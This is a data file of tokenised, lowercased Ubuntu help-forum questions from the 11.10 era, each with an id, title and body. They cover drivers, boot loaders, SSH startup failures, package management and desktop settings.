98925	customize guest account ?	i am using 11.10 with single user , sometime when someone wants my system i ca n't deny so i have to give them my pc along user account password . i was willing if i give them my guest account but when i open guest account and discover that there is something i wish to change . i want 2 hide some of application from guest user . if needed i set password for guest user . i want some customization on privileged of guest account ? is that possible ?
98926	qos ( quality of service ) criteria in router for ubuntu one	i 'm looking for qos criteria in order to lower priority of traffic while synchronizing big files . ubuntu one uses 443 port which can not be good criteria because it is common for all https traffic . destination ip is also does not seems to work because ubuntu one uses range of ip 's . any ideas will be appreciated , thanks , yb .
98927	how to fix thunderbird 's buggy update	after the latest batch of updates ( 11.10 ) , thunderbird was updated too . however , as can be seen in the screenshot , thunderbird now defaults the quick filter bar to icons-plus-words which also breaks the layout ( look at the search bar to the right ) . when i click on view , to uncheck and re-check the quick filter bar option , it reverts to just icons , as originally expected . however , if i shut down down thunderbird and launch it , the icons-plus-words appear and i have to go through the same process again . how do i fix this ?
98931	how do i get date & time widget in my system tray ?	somehow i managed to remove the date & time widget from my system tray . how do i get it back ? also `` date & time '' no longer appears in system settings . i 'm running ubuntu 11.10 .
98932	how do i get the hanvon graphic tablet driver ?	i have a hanvon graphic tablet , and guides are suggesting i should compile the driver . i have never had to compile a program before . a link to the driver is in this ubuntu forums post . i love ubuntu and this tablet is the only reason i use windows . i am disabled with nothing to do . i need to doodle , it is what i love to do .
98936	wired connection not working ( unplugged ) help ?	i configured the pppoe connection in network manager it works perfectly fine when i start my computer after some couple of hours/min the network gets disconnected . when i check the network manager it says wired connection unplugged so when i restart it works fine again . can anybody help because i dont want to restart my pc again and again .
98943	how can remote host be mounted with nautilus from comnmand line to avoid a nautilus window is opened ?	a remote host can mount with nautilus : nautilus sftp : // < target-host > but , in this case a nautilus window is opened . i would like to use this command in a script . how can i avoid window opening ? remark : i know sshfs , but i would like to use nautilus because i would like to see the connection in sidebar of nautilus and sshfs can cause problem if the remote host is down .
98949	'gnome-shell ' process causing 100 % overall cpu utilization ? what is going wrong ?	since morning today , my laptop has been freezing up frequently . only option available at that time is to kill x-server ( as ctrl-alt-backspace is the only thing which works that time ) . i checked `` task manager '' and it shows `` gnome-shell '' process consuming upto 70 % of cpu . what is going wrong and what can be done to fix it ? update issue happened again and i captured few snapshots , which shows the consistent cpu percentage consumed by 'gnome-shell ' process . you can also check the `` graph '' on top-center , which is continuously touching the roof ! update i 've moved to cinnamon desktop . this problem was hampering my work productivity alot so finally made the switch and i 'm pretty comfortable with it now .
98953	download ubuntu 11.10 with all update and upgrade	where can i get ubuntu 11.10 with all update till now ? because every time i have update to internet and it take hour for that . please help me .
98954	converting to btrfs from md raid5 with lvm	i have decided to start the transition to btrfs this weekend . i have a desktop with one md raid1 which is used for boot , and one large md raid5 for everything else . on top of the md raid5 , i have lvm with vg-root , vg-swap and vg-home . my idea is that i keep the raid1 with ext4 as boot and i wo n't convert the lvm at once . instead , i 'll create a new btrfs root on the raid5 , create a fresh home directory , move over configs and bare necessities , and then move things over as i need them . that way , the size of the potential restore will increase as the likelihood of bugs decrease . now the question is ; how do i actually do that ? : ) i 'm hoping for some expert advise here .
98956	help - ubuntu creates a temp file for every file i edit	i dont know how to explain it very well so i took a picture of it . it seems that every time i edit a text file and save it , the sistem makes a file with the changes or whatever next to the other file . i am making a website and when i copy them through ftp it takes longer becaouse of those files , and i have to delete them one by one in the folder every time i edit them
98960	what user groups are there in northwest ohio ?	i am wondering who the users here are from northwest ohio . i would like to get a group together and chat , start projects , art ideas , you know . i know there is a ohio loco but most of the people that i hear from is in columbus ohio pretty far away for me .
98962	ubuntu 11.10 not showing up in grub bootloader after update and restart : (	i was using ubuntu 11.10 with gnome-shell . i installed various useful softwares and ran system update using update manager which ran smoothly and asked me to restart my comp at the end . i restarted it to find that ubuntu entries were missing from the grub bootloader and only memory test and windows are showing up . i took a lot of pain in installing various important softwares and can not afford a re-installation . tried to boot from the live cd and installed boot-repair and after running it .. it wasnt working properly .. it was just showing that it was `` scanning systems '' for more than an hour . kindly help . thank you ..
98964	compiz moves wine windows	since ubuntu 11.10 compiz does not position wine menues correct but moves them to the screen 's right corner . screenshot 1 : http : //media.cdn.ubuntu-de.org/forum/attachments/3900002/bildschirmfoto.png screenshot 2 : http : //media.cdn.ubuntu-de.org/forum/attachments/3900002/bildschirmfoto2.png does anybody know how to work around ?
98965	is there a power saving way to download torrents ?	i usually download my torrents at night , while i 'm sleeping . but when doing so , ubuntu loads the entire desktop interface , while i only need the torrent client . i would like to use an energy saving way of downloading torrents to make my power usage go down . i know that transmission-cli can download torrents in a command line . such a thing might be the solution , but with tranmission-cli , i have to include the torrent 's url to get it running , e.g . transmission-cli http : //releases.ubuntu.com/11.10/ubuntu-11.10-desktop-i386.iso.torrent . that 's not what i want . if a command line interface ( cli ) torrent client would be the best way to save power , i want it to import the active torrents from the gui , including the parts that are already downloaded . is there any way to get this done ? i 've got transmission and deluge already installed , so if it could be done with one of these torrent clients , it would be nice . thanks .
98972	does jupiter really improve battery power ?	i installed jupiter on ubuntu 11.10 and set the preference mode to `` power saver '' but have n't seen any noticeable difference . does it really do what it claims ?
98974	how can i adjust the screen brightness on my laptop via fn buttons ?	when i press the fn+f5 or fn+f6 , the sliders goes up or down , but the brightness wo n't change . i had the same issue on the lucid lynx , but i could fix adding âquiet acpi_osi=linux acpi_backlight=vendor splashâ to the `` grub_cmdline_linux= '' . but on the 11.10 , this solution wo n't work . if i try this workaround , the brightness slider stop working ( show either maximum brigthness or minimum , but no change ) . if i add only `` acpi_osi=linux '' the slider works , but still no change . i 'm desperate for a solution now , it 's been months looking for it and it 's really difficult to use the laptop with maximum brightness all-time . some distros like opensuse works fine , but i hate 'em . my laptop : motherboard : pegatron h24z bios : american megatrends 200.t67 intel core2duo t6600 2gb ram hd 500gb brand : positivo sim+ ( brazillian pc-maker )
98976	icons and text disapear after using the system for a while	i 've installed ubuntu 11.10 on my machine ( lenovo w520 ) and i 'm having troubles with the display after using the system for a while : some icons disappear and the text as well , especially in terminals and banshee . this seem to only be happening when using unity . i ca n't reproduce it when using i3 or awesome wm . i have n't tried with gnome3 , though . dmesg is filled out with : [ 73580.364281 ] [ drm : i915_gem_create_mmap_offset ] error failed to allocate offset for bo 0 i 'm not sure if it 's a known bug or what , thus asking : )
98979	installed ati driver but no effects	i am newbie to linux so i do n't know if this is a proper question to ask . i installed my ati driver on ubuntu 11 ( im using ati radeon hd 2600 xt ) and since my system info shows `` graphic : vesa : rv630 '' everything 's fine , i guess . but the thing is that i do n't have any of those desktop effects , so i suggested that something is wrong , but i 'm not quite sure what . can someone help ? *i have downloaded my ati driver from amd site . //ok my problem is solved . i apologize for any kind of disturbing . i simply ran the unity -- reset , installed the ccsm once again , rebooted computer and everything is working fine . as i said , i 'm new to linux so i apologize once more .
98981	how can i stop a window maximizing across two screens ?	i currently run ubuntu 11.10 with unity and fglrx driver . i also use two monitors . right now , if i maximize a window it does so across both screens . in addition , things like alt-tab will display split across both screens . it seems as if the computer is running with one giant desktop as opposed to two seperate desktops ( workspaces ? ) as it did with the open source driver . and no , i can not go back to the open source drivers as they do not support hybrid graphics like the fglrx drivers do .
98987	what site can i use to generate a custom sources.list ?	i 've just installed ubuntu 11.04 , after installing 10.10 i found a real useful official site which compiles a /etc/apt/source.list that can be copied and pasted , and a list of the key commands for terminal . i do n't seem to be able to find it now and the only others i can find are generic lists that others have made .
98988	console command to inhibit screensaver ?	is there any console command to inhibit the screensaver in ubuntu 11.10 ? i do n't want to have indicators like caffeine for every function i need . in gnome 2.x it was something like gnome-screensaver -- inhibit .
98994	do i need to use open source drive of ati for switcheroo ?	in ubuntu11.10 , i still need to use open source drive of ati when using switcheroo ? the 'addon driver ' in system menu is about open drive or propriety driver ? thanks
98995	system programming in ubuntu	i 'd like to get into ubuntu systems programming ; to be specific - developing and debugging device drivers . however , i 'm not sure about how to get started , even though i have prior experience contributing to other open source projects . i have considerable skill/experience programming in python ( but thats going to be useless here , i guess ) , moderate c programming skills , good debugging skills ( only user-mode programs though ) , decent static reversing skills ( more of a hobby ) and have gone through a short ( but really enjoyable ) kernel module programming tutorial here . there are a few questions i 'd like to ask . any particular advice you would like to give me ( something you had to learn the hard way ) . an abstract question , yes . i have been an ubuntu user for a long time , but i 'm not sure where i can start helping out . given my specific interests in device drivers , any suggestions ? suggested reading material ? i 'm currently reading `` linux system programming - talking to the kernel and c library '' . suggested reading material related to device driver debugging ? thanks .
98999	installing ubuntu alongside windows 7	i 'm running windows 7 on my hp laptop and i want to install ubuntu on it . in the installation window i do n't get the option for installing ubuntu alongside windows . i have only two options : remove windows and install ubuntu and something else ... whats wrong ?
99003	error in installing virtualbox guest additions iso file mount	i have install virtualbox 4.0.4-ose on my ubuntu 11.04 . i want to install the guest additions of virtualbox . but i 've gotten this error : failed to open the cd/dvd image /home/bigbang/.virtualbox/vboxguestadditions_4.0.4.iso . the medium '/home/bigbang/.virtualbox/vboxguestadditions_4.0.4.iso ' ca n't be used as the requested device type . the step i do for install it is : devices > install guest additions , then click yes to download the required .iso file from the internet and then click mount button after the file is downloaded and then it gives me the error . edited : my host is ubuntu and the guest os is xp .
99005	what are the system requirements for gnome 3 ?	i have lucid running pretty stable out of box on my dual core 3.0ghz pentium with 1gb of ram , so would it be pushing it to throw gnome 3 on there ?
99007	how can i set my system to suspend when inactive to a longer amount of time	i run mythtv on some ubuntu 11.10 based machines . in the power settings , i can choose from a list of time periods from 5 minutes up to 1 hour for the the machine to suspend when inactive . i would like to set the suspend to occur at a longer interval , like 2 hours or 4 . previously with gnome , i would think that i could go into the gconf editor and find the key there , i am not sure with unity where to override a setting like this . any suggestions ?
99008	how to avoid updating some packages	when using ubuntu at work i have to untick facebook and twitter plugins for gwibber every time the update manager starts ( i get 403 - forbidden ) . is there a way to tell the update manager to stop looking for these updates without removing gwibber ?
99024	explanation of exporting a path variable	was hoping someone can explain what the command to exporting a path variable means ? e.g . : alias test1= '' /usr/local/test1 '' export path= $ test1 : $ path does the colon append ?
99025	laptop wifi problems	two different dell laptops , a latitude d820 and an e5510 both running ubuntu 11.10 . both will connect to wireless , but immediately drop the connection and then make me reinput the wireless key . the wireless router is a cisco wrvs4410 using wpa-personal security and is working fine for several windows laptops , kindle fires , wii , xbox360 etc . its just these two ubuntu laptops that wo n't stay connected .
99033	what is the difference between apt-get upgrade and apt-get dist-upgrade ?	some say that dist-upgrade is to upgrade the distribution ... actually , that 's not true ... its an old story ... the man pages say that 'upgrade ' will update the packages without touching the dependencies and 'dist-upgrade ' will also touch the dependencies and remove them if it wants to . i ca n't fully understand this ... can some one please make this clear ? a full explanation ? is it a risk to use dist-upgrade ? why do we have two commands like this ? thanks in advance ...
99035	cant start ssh server	background kernel : 3.0.0-14-generic os : ubuntu 11.10 - desktop problem : cant start ssh daemon system log ( snippet ) : [ 451.862562 ] init : ssh main process ( 3042 ) terminated with status 255 [ 451.862641 ] init : ssh main process ended , respawning [ 451.873345 ] init : ssh main process ( 3045 ) terminated with status 255 [ 451.873405 ] init : ssh main process ended , respawning [ 451.883863 ] init : ssh main process ( 3048 ) terminated with status 255 [ 451.883923 ] init : ssh main process ended , respawning [ 451.895982 ] init : ssh main process ( 3051 ) terminated with status 255 [ 451.896090 ] init : ssh main process ended , respawning [ 451.907059 ] init : ssh main process ( 3054 ) terminated with status 255 [ 451.907130 ] init : ssh main process ended , respawning [ 451.917883 ] init : ssh main process ( 3057 ) terminated with status 255 [ 451.917951 ] init : ssh respawning too fast , stopped problem occurs at boot and also trying to manually do command ( either of commands ) : sudo service ssh start sudo /etc/init.d/ssh start attempted fixes : within sshd_config : changed listenaddress to both 0.0.0.0 and the actual lan ip address sent hup to ssh process ( well there was no ssh process so end result did nothing ) . reinstalled openssh-server have n't done anything with upstart . recommendations ? references below sshd_config file : # package generated configuration file # see the sshd_config ( 5 ) manpage for details # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes # authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication no # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd yes printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . ; usepam yes /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp # set up the bridge interface for openvpn # auto br0 # iface br0 inet static # address 10.0.1.199 # netmask 255.255.255.0 # gateway 10.0.1.1 # bridge_ports eth0 # iface eth0 inet manual # up ifconfig $ iface 0.0.0.0 up # up ip link set $ iface promisc on # down ip link set $ iface promisc off # down ifconfig $ iface down additional output : ps auxw | grep ssh kevdog 1916 0.0 0.0 3856 180 ? ss 10:12 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/bin/gnome-session -- session=gnome-with-compiz kevdog 3170 0.0 0.0 4448 796 pts/0 s+ 11:32 0:00 grep -- color=auto ssh
99036	apt trouble . repository lists damaged	i was trying to upgrade to 10.10 from 10.04 , when i hit the following error . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/mirror.letsopen.com_os_ubuntu_dists_natty_main_bin ary-i386_packages , e : the package lists or status file could not be parsed or opened . ' now no repository will load and i 'm unable to user synaptic or apt or software center . i googled and found out that running sudo rm /var/lib/apt/lists/* -vrf will fix it , but that did n't work either . any ideas ?
99038	why the ubuntu installer does not detect the hard drive during installation ?	i have a new computer with a seagate st500dm002 sata internal hard drive . i am trying to install on it ubuntu 11.10 @ 64 bit but the installer does not recognize/detect/see the hard drive . when i reach the `` installation type '' step , the panel -- which was supposed to show devices and partitions -- looks empty . a `` sudo fdisk -l '' shows only /dev/sda1 , the usb drive from which i am running the installation . i have already the following two solutions without any success : sudo apt-get remove dmraid switch the sata mode in the bios from ide to ahci i am sure it 's not a hardware related problem as i have already successfully installed another operating system on the same computer . the output of `` sudo lshw -class storage -class disk '' follows : *-ide unclaimed description : ide interface product : asmedia technology inc. vendor : asmedia technology inc. physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : ide msi pm pciexpress cap_list configuration : latency=0 resources : ioport : d040 ( size=8 ) ioport : d030 ( size=4 ) ioport : d020 ( size=8 ) ioport : d010 ( size=4 ) ioport : d000 ( size=16 ) memory : fe400000-fe4001ff *-storage description : sata controller product : 6 series/c200 series chipset family 6 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi1 version : 05 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:44 ioport : f0b0 ( size=8 ) ioport : f0a0 ( size=4 ) ioport : f090 ( size=8 ) ioport : f080 ( size=4 ) ioport : f060 ( size=32 ) memory : fe705000-fe7057ff *-cdrom description : dvd-ram writer product : dvdram gh22ns70 vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : ex00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-scsi:0 physical id : 1 bus info : usb @ 1:1.2 logical name : scsi6 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk physical id : 0.0.0 bus info : scsi @ 6:0.0.0 logical name : /dev/sda size : 14gib ( 16gb ) capabilities : partitioned partitioned : dos configuration : signature=0004e5a4 *-scsi:1 physical id : 2 bus info : usb @ 1:1.3 logical name : scsi7 capabilities : emulated scsi-host configuration : driver=usb-storage *-disk description : scsi disk product : storage device vendor : usb mass physical id : 0.0.0 bus info : scsi @ 7:0.0.0 logical name : /dev/sdb capabilities : removable *-medium physical id : 0 logical name : /dev/sdb any idea on what i could do to fix this problem ?
99041	boot files ubuntu 11.10	if i want to start the boot process , what file do i point to ? i have ubuntu 11.10 installed on a separate disk from opensuse 12.1 and windows 7 . when i installed ubuntu , i had to reinstall the opensuse to boot it and windows . using opensuse boot loader , i ca n't seem to get the boot menu configured to start ubuntu . i understand my problem is with the opensuse boot loader not being configured correctly . as a newbie i do n't really understand the boot process of a linux system .
99042	what happened to firefox browse by name service in location bar ?	i just updated the firefox package in ubuntu 10.04 and firefox 9.0.1 was installed . the address bar no longer works as it once did ( using google 's browse by name service ) , now all it does is use google normal search service . seeing that there is another search bar in firefox , just to find stuff in google ( and other search engines ) , what 's the point of this ? is there a usability advantage that i 'm currently not seeing ? i know all you have to do is add http : //www.google.com/search ? ie=utf-8 & sourceid=navclient & gfns=1 & q= to the keyword.url in the about : config preference page . i just want to know if this is a bug , a thought decision , or something that just slipped past the usability testers . thank you in advance !
99049	synaptics touchpad disabled after update in kubuntu	i have one kubuntu computer running 11.10 , after the updates a few days ago my synaptics touchpad died , it simply refuses to run , i am sure its a software thing because it works if i use a livecd . keyboard is working perfect , i can login , open a terminal and use my computer but would be nice to make the touchpad run again . anyone can guide me on where to find information and how to enable my touchpad again ?
99051	lucid hydra ( lucidlogix ) technology support	i will soon be buying an intel z68 motherboard ( sandy bridge ) which supports lucid hydra and lucidlogix virtu gpu virtualization . are this supported on ubuntu 11.10 or 12.04 . if not , what or how will ubuntu run while using this type of hardware . the last article i read about this was in phoronix but it was almost a year ago : http : //www.phoronix.com/scan.php ? page=news_item & px=otixoq ( would be good if they made an updated one for 12.04 ) i only use the pc right now for making small videos , visiting askubuntu 50 times a day and maybe playing l4d2 , web programming and using virtualbox .
99052	how to launch grub menu for ubuntu guests in virtualbox ?	i have ubuntu 12.04 alpha installed in virtualbox . when the virtual machine is started , it boots directly to the login screen without showing the grub menu . how can i get the grub menu to show up on start ? please note : the graphics is broken after recent updates , so i can not login and make the changes . it is stuck at the screen `` ubuntu is running on low graphics mode '' and the mouse and other keys do not work .
99055	installing software from package sources vs downloadable .deb files	apart from getting automatic updates through apt-get upgrade and chain updates from library dependency upgrades , why would one use ubuntu packages versus .deb files you could get from the software manufacturers ? ( e.g . skype , eclipse , opera , etc.. )
99059	install android os along with ubuntu and windows	i have dual boot of windows and ubuntu 11.10 , i recently learned that it is possible to install android os on laptops , i also learned that in such cases android uses its own bootloader , now what i want is install android along with ubu and win . use grub/burg as the boot-loader . and i was unable to find info about second point in the internet , help needed
99061	can i get ubuntu one to automatically download and sync a folder ?	i would like to know if it 's possible to automatically download to local a folder in ubuntu one every time that i have internet connection .
99070	how can i get rid of this indicator ?	i have an indicator , i think the messaging menu , that i 'd really like to get rid of : how can i stop it from starting and kill it if it 's already running ?
99071	how do i get scrollbar buttons in lubuntu ?	remember those buttons at the ends of vertical scrollbars for scrolling up and down one line at a time ? i would like those on my lubuntu system . it 's a pain without them , particularly for laptop users with no external mouse . as i understand overlay-scrollbar is something different and is not the subject of my question . so i do n't think this is a duplicate of how do i disable overlay scrollbars ? . i see the problem in geany and lxterminal . visible scrollbar but no arrow buttons at either end . its the buttons i want back . i followed the instructions in the link to the supposed duplicate and they had no effect after a restart .
99079	pcsx2 on ubuntu	pcsx2 ( playstation 2 emulator ) wo n't work under ubuntu 11.10 x64 . it worked when i was running ubuntu 11.10 x86 and i heard it worked under ( windows x86 x64 ) as well . when i downloaded the pcsx2-0.9.8-r4594-linux.tar.gz i extracted it in the home directorie and run the launch_pcsx2_linux.sh file but when i run it it close immediately when i open gnome-terminal and typ ./launch_pcsx2_linux.sh i get this error ./pcsx2 : error while loading shared libraries : libwx_baseu-2.8.so.0 : can not open shared object file : no such file or directory when i type sudo apt-get install libwxbase2.8-0 it says that is already installed . i tried running the pcsx2 file directly but it does nothing
99080	keysym control_r = left ; does not repeat when held	keysym control_r = left my right ctrl key switches back to right ctrl if i hold it , rather than acting as if i 'm holding the left arrow key . does anyone have a solution for this ?
99081	need to prevent a package from being installed	i have a package i do not want to be installed even if another needs it . is there any way to `` blacklist '' a package from being installed even as a dependency of another ? can i overcome the fact that it is a dependency and still be able to upgrade my system ? i am thinking in particular about the messaging indicator from unity . if i remove it and add unity again for some reason , i dont want the applet installed again . how can i prevent it from being installed ? ( or the global menu , java versions removing my custom installed one , etc ... you get the idea ) .
99083	how do i create a boot disk ?	i have a working ubuntu partition on one of my hard drives , however grub is not installed . what i would like is a 'boot disk ' which allows me to boot this partition . does such a thing exist ? i 'm pretty sure i remember using something of the sort in the distant past ...
99086	how to check needed power supply for my pc ?	i want to buy ups , but do n't know parameters . how i can check my hardware for it ?
99088	twitter breaks connection in 11.04	in ubuntu 11.04 whenever i tried to open any twitter page , internet connection ( wireless ) breaks down . after a while ( about 30 seconds ) connects again . it 's not about browser or modem/wireless . i 've already tested on different browsers and also different os . any suggestion or solution ?
99097	how to remove duplicate in nautilus devices list ?	nautilus shows a drive twice under `` devices '' when logged in the main account . only one of these actually works . when i launch nautilus as root the drive is shown only once . how do i reset nautilus to the default settings ?
99098	manually sync play counts in ubuntu	i am following the advice located at this link to manually change the playcounts in banshee by altering the database : manually set track listen count in banshee ? but it is too time consuming to individually change the play counts for every track in a playlist . can someone give me the line of code i need to update every track with a given value ( ex . year=85 ) to a certain play count number ( ex . play count= 5 ) .
99099	error installing cinnamon desktop package	saw this article at howtogeek.com for cinnamon desktop alternative . per the article , i successfully added the repository to ubuntu 11.10 : sudo add-apt-repository ppa : merlwiz79/cinnamon-ppa but then got these error messages when i try to install with : sudo apt-get install cinnamon cinnamon-session cinnamon-settings i get these faults : e : unable to locate package cinnamon` e : unable to locate package cinnamon-session e : unable to locate package cinnamon-settings any suggestions to help resolve ? thanks !
99101	how to install a specific version of java ?	i want to install jdk 6u30 or later on ubuntu ( but not java 7 ) , how can i do so ? i 'm on ubuntu 11.10
99102	what qualifies an application as frequently used ?	i am aware that something called zeitgeist is used to determine the `` most frequently used '' part of the unity dashboard , but i was wondering what the specifics where . i know the amount of applications in this section varies , so it 's not as simple as the # with the most uses today . is there any ( relatively ) simple way of expressing the rules which dictate the listing and ranking of most frequently used ?
99103	how to resolve problem with two versions of google earth installed from different sources ?	both i installed google earth 6.1 several months ago . i 've just install ge 6.2 this evening by downloading the .deb package on the google site . after the download , ge installed fine with the software center . i found ge 6.2 with the unity lens and drag + drop on the unity launcher . ge opens and seems to work fine . but the issue is that i still have 6.1 on my computer , i thought it had been upgraded automatically to 6.2 . i can find 6.1 on the software center as it says it is installed , but i ca n't find any 6.2 . i open synaptic and can find 6.1 but not 6.2 . so my questions are : how do i uninstall 6.1 without breaking 6.2 ? why is there no trace of 6.2 on my machine ? where is 6.2 installed on my hard drive , as 6.1 is on my home/.googleearth directory ? first thanks to everyone for taking time to answer . synaptic is already in my computer and i can now understand as i see the 2 packages related to google earth . ge 6.2 is in a package called google-earth-stable and the older version is in a package called googleearth ( see attached picture ) . what i still do n't understand is that in unity 's dash menu i can see google-earth-stable and googleearth but in the install software tab of the software center , i ca n't see any trace of google-earth-stable installation or googleearth ? perhaps this is because there are not software but packages ? http : //ubuntuone.com/06x7qzowjxpe72ceo5xcu7 can i safely unistall googleearth without braking google-earth-stable via the software center ? also i saw that in the snapshot that googleearth ( older , v. 6.1 ) has a version of 6.0.3.2197+0.6.0-1 and the google-earth-stable ( newer , v. 6.2 ) has a version of 6.1.0.5001-r0 . why is it that the product version numbers do n't match the packge version numbers ?
99105	ca n't get unity 3d to work in 11.10	i recently upgraded to 11.10 on my lenovo thinkpad t520 , and i 'm not able to load unity 3d ( i 'm not selecting 2d at login menu either ) . me @ mycomp : ~ $ echo $ desktop_session ubuntu-2d i ran the unity support test below as well . me @ mycomp : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : unable to create the opengl context and it looks like i only have one graphics card : me @ mycomp : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) also , ubuntu lists nothing under the `` additional drivers '' window . any help would be extremely appreciated as i 'm somewhat of a noob . thanks ! edit 1 : here is the output of lshw -c display me @ mycomp : ~ $ sudo lshw -c display *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : f0000000-f03fffff memory : e0000000-efffffff ioport:5000 ( size=64 )
99111	ati 12.1 driver fails after logout	yesterday i have upgraded my ati proprietary driver to 12.1 . after some small issues it installed correctly , i have confirmation in catalyst that the driver is at version 12.1 . today i have noticed that after each log out , when i try to log back in , the screen freezes on my wallpaper . the mouse is working fine . ctrl-alt-backspace resets the xserver , and prompts me back to the log in page . if i try a login , same thing happens . if i reboot from the login screen , i can log in into unity 3d without any issue . the issues happen only if i try to log-out and then back in . if i log in on ubuntu 2d , it works fine . so , any ideas ? edit : i think that 's what 's happening when i try to re-login . taken from /var/log/syslog : gnome-session [ 3017 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 kernel : [ 1124.496537 ] [ fglrx ] irq 49 disabled edit 2 : i have reverted to the drivers 11.12 and 11.10 ( currently using it ) and the behavior is the same . the problem is that i do n't remember if i had this problem before or not . i would guess not , so , something is wrong here . it 's not a show stopper for me , because i do n't need to log-out / log-in , but still it 's an error .
99112	wubi 's root.disk is missing , but you can still log in as a guest - where is the data ?	my laptop is running windows 7 and ubuntu , which was installed via wubi . ubuntu boots perfectly fine , but i can only log in as a guest . so in order to recover the files , i have to find root.disk so i can mount it and recover the data using ecryptfs-utils . the file is supposed to be in c : \ubuntu\disks\ , but it is n't . a file search ( in windows ) did n't turn up anything else . where could this file have gone ? i thought the disk might be broken . but , again , i can log in as a guest .
99114	how do i remove ._ from beginning of filename ?	i have several files ' names starting with `` ._ '' . i 'd like to remove the point and underscore in a script . howto do this ? thank you very much in advance .
99122	lightdm and gdm broken after upgrade to 11.10	i upgraded to oneiric . when my machine boots , i get a black console with text messages listing the services that are starting up , and then my machine sits there in that state and lightdm never comes up . i am able to log in by doing control-alt-f1 , logging in , and doing a startx by hand . i tried switching from lightdm to gdm , but that has n't helped either . i tried doing sudo start gdm but it tells me that gdm is already running . the file /etc/x11/default-display-manager contains /usr/sbin/gdm . any suggestions on how to fix this ? thanks . my video card is nvidia : $ lspci | grep vga 02:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 )
99124	log of people/ip 's who connected to my machine through remote desktop	my network has a static ip . and i could see some un-intended user tried to access my machine through remote desktop . where can i see the log of the same ? using ubuntu 10.04
99128	how can i install a rhythmbox plugin on my ubuntu vps ?	i am trying to install a rhythmbox plugin ( file organizer https : //launchpad.net/rb-fileorganizer ) on my vps ubuntu installation . on the desktop , i would be required to open the folder then double click install . on the server , i downloaded the plugin got to the directory but i have no way or 'double clicking ' of running the installation file via the terminal . i have attached an image of what i see .
99131	`` testing download servers '' hangs	from software sources | select best server , the `` testing download servers '' progress bar only gets halfway through and then hangs . tried several times over many different days , and predictably hangs at the same spot . downloading from the repositories is painfully slow , like 30kbs , so would very much like to find a faster server . any suggestions to either get past this problem or perhaps suggest fast servers that keep current with releases ? thank you !
99136	how much benefit does increasing memory ram have on the system ?	i will soon have a pc that can handle up to 32gb of ram ( yeah my dream comes true ) but i would like to know , because this is the first time i am jumping the 4gb boundary on a home computer , how much performance increase and general benefit will i have if i use 8gb , 16gb or 32gb for the system . apart from the huge jump in price i want to see if it 's worth buying more memory for ubuntu , in this case 11.10 but soon 12.04 and how much of a difference it will be . i will be using the 64bit version of 11.10 for normal activities like : openoffice ( max 6 documents opened ) browsing with firefox/chrome ( more than 10 tabs opened ) listening to banshee wine and some games virtualbox ( win xp , win 7 , ubuntu ) compiling from github like there is no tomorrow downloading with torrent app using gimp and inscape + sozi using openshot/pitivi using subdownloader for movies ...
